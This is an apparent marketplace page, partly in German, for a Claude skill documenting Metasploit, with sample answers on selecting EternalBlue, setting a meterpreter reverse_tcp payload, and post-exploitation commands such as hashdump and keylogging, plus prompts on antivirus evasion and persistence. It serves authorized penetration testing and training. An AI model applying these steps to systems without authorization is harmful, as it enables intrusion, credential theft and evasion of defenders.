metasploit-framework
Master Metasploit Penetration Testing with Claude
Security professionals need expert guidance for authorized penetration testing workflows. This skill provides comprehensive Metasploit Framework documentation covering exploitation, payload generation, and post-exploitation activities with legal best practices.
Die Skill-ZIP herunterladen
In Claude hochladen
Gehe zu Einstellungen â Fähigkeiten â Skills â Skill hochladen
Einschalten und loslegen
Teste es
Verwendung von "metasploit-framework". How do I start msfconsole and search for SMB exploits?
Erwartetes Ergebnis:
To launch msfconsole and search for SMB exploits: Start the console with 'msfconsole -q' for quiet mode, then use 'search type:exploit smb' to find SMB-related exploit modules. You can also search specifically with 'search eternalblue' for the MS17-010 SMB vulnerability exploit. Review module details with 'info [module_name]' before selecting.
Verwendung von "metasploit-framework". What are the steps to configure and run an exploit with a meterpreter payload?
Erwartetes Ergebnis:
Configure an exploit in six steps: First use 'use [module_path]' to select the exploit. Run 'show options' to view required settings. Set target parameters with 'set RHOSTS [target_ip]' and 'set RPORT [port]'. Choose your payload with 'set PAYLOAD windows/x64/meterpreter/reverse_tcp'. Configure listener with 'set LHOST [your_ip]' and 'set LPORT [port]'. Finally execute with 'exploit' to attempt compromise and establish a Meterpreter session.
Verwendung von "metasploit-framework". What Meterpreter commands should I use after getting a session?
Erwartetes Ergebnis:
After establishing a Meterpreter session, run 'sysinfo' and 'getuid' to understand your access level. Use 'hashdump' to extract password hashes and 'ps' to view running processes. Execute 'migrate [PID]' to move to a more stable process. For data exfiltration, use 'download [file]' or 'upload [file]'. Run 'screenshot' to capture the desktop or 'keyscan_start' to begin keystroke logging. Background the session with 'background' to return to msfconsole.
Sicherheitsaudit
Mittleres RisikoThis skill provides documentation for the Metasploit Framework, a legitimate penetration testing tool used by security professionals. All detected patterns are educational examples showing authorized security testing workflows. The skill includes appropriate legal disclaimers emphasizing written authorization requirements. While it documents offensive security capabilities that could be misused, the context clearly indicates professional security assessment purposes with proper legal safeguards.
Probleme mit mittlerem Risiko (1)
Probleme mit niedrigem Risiko (3)
Risikofaktoren
âď¸ Externe Befehle (4)
đ Netzwerkzugriff (3)
đ Dateisystemzugriff (1)
Qualitätsbewertung
Was du bauen kannst
Penetration Testing Workflow Guidance
Security professionals use this skill during authorized penetration testing engagements to navigate Metasploit Framework capabilities, select appropriate exploit modules, configure payloads, and conduct post-exploitation activities within legal scope.
Security Assessment Documentation
Red team members leverage this skill to document Metasploit usage in security assessment reports, ensuring proper command syntax, module selection, and post-exploitation activities are recorded accurately for client deliverables.
Educational Resource for Security Training
Cybersecurity students and certification candidates use this skill to learn Metasploit Framework concepts, practice penetration testing workflows in lab environments, and prepare for certifications like OSCP, CEH, and PTX.
Probiere diese Prompts
How do I search for and select an appropriate Metasploit exploit module for a Windows target with SMB vulnerabilities?
Guide me through configuring the eternalblue exploit with a meterpreter reverse_tcp payload, including setting RHOSTS, LHOST, and required options.
After establishing a Meterpreter session, what commands should I use to enumerate the target system, harvest credentials, and maintain persistence during an authorized penetration test?
Generate an msfvenom command to create a Windows executable payload with reverse TCP connection, including encoding to evade antivirus detection.
Bewährte Verfahren
- Always obtain written authorization before conducting any penetration testing activities with Metasploit
- Use the 'check' command first to verify target vulnerability before running exploits to minimize disruption
- Test payloads in isolated lab environments before deploying to production assessment targets
- Document all commands, results, and findings for inclusion in penetration test reports
- Use encrypted reverse_https payloads instead of reverse_tcp when possible to evade network monitoring
- Background sessions and migrate processes immediately to maintain access stability
Vermeiden
- Do not use Metasploit exploits on systems without explicit written authorization - this is illegal
- Avoid running all exploits sequentially against targets without proper reconnaissance and vulnerability verification
- Never use production systems or public IP addresses in example commands during documentation or training
- Do not leave active Meterpreter sessions unattended or forget to properly close them after assessments
- Avoid using unencoded payloads that are easily detected by antivirus without testing evasion techniques first
Häufig gestellte Fragen
Is Metasploit Framework legal to use?
What is the difference between msfconsole and msfvenom?
Why do my exploits fail or sessions die immediately?
What are the different payload types in Metasploit?
How do I evade antivirus detection with Metasploit payloads?
Can this skill execute Metasploit commands directly through Claude or Claude Code?
Entwicklerdetails
Autor
sickn33Lizenz
MIT
Repository
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/metasploit-frameworkRef
main
Dateistruktur
đ SKILL.md